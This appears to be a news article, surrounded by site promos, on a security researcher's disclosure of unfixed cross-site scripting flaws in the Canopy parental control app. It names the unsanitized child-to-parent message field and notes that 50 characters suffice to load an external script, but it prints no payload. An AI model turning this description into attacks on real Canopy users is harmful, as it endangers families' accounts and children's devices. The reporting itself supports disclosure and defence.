The Canopy parental control app has an exhaustive list of features that allow parents to limit and monitor use of protected devices.
We're looking at how our readers use VPNs with streaming sites like Netflix so we can improve our content and offer better advice. This survey won't take more than 60 seconds of your time, and we'd hugely appreciate if you'd share your experiences with us.
>> Click here to start the survey in a new window (opens in new tab) <<
- Shield yourself with these best identity theft protection services (opens in new tab)
- Here's our choice of the best malware removal (opens in new tab) software on the market
- These are the best ransomware protection tools (opens in new tab)
“When the parent logs in, the attacker would have access to the parent portal and all features a parent has for monitoring and controlling child devices. It looks like an attacker would be able to do this en masse to all customers of Canopy,” notes (opens in new tab) Young in his breakdown of the app’s flaws.
Abusing privileged access
Being a security researcher, Young was intrigued by the app’s list of features, many of which suggested that the app will have privileged access to the protected device. This privileged access has the potential of introducing risk to the protected devices and the privacy of the children using those devices, argues Young.
While exploring the app he discovered that the block page enabled the child to request access to the blocked resource page, as well as a text box to send a message. Much to Young’s surprise though, the input field wasn’t sanitized and allowed up to 50 characters, which he notes is enough to call in a malicious external script.
While his first tests were innocent examples of how a child could exploit the vulnerability to access blocked resources, and even pause monitoring protection altogether.
However, the threats arising out of the vulnerability were a lot more serious, and Young has consciously avoided sharing details in his post since Canopy has failed to fix all the attack scenarios.
“I reached out to Canopy by phone and by email repeatedly. Ultimately, they produced a fix for the XSS from child to parent but failed to do anything to protect against the parent to child XSS or XSS through the URL of a blocked page request before becoming unresponsive. Canopy needs to implement sanitization of all user-input fields but has failed to do so,” claims Young.
- Protect your devices with these best antivirus software (opens in new tab)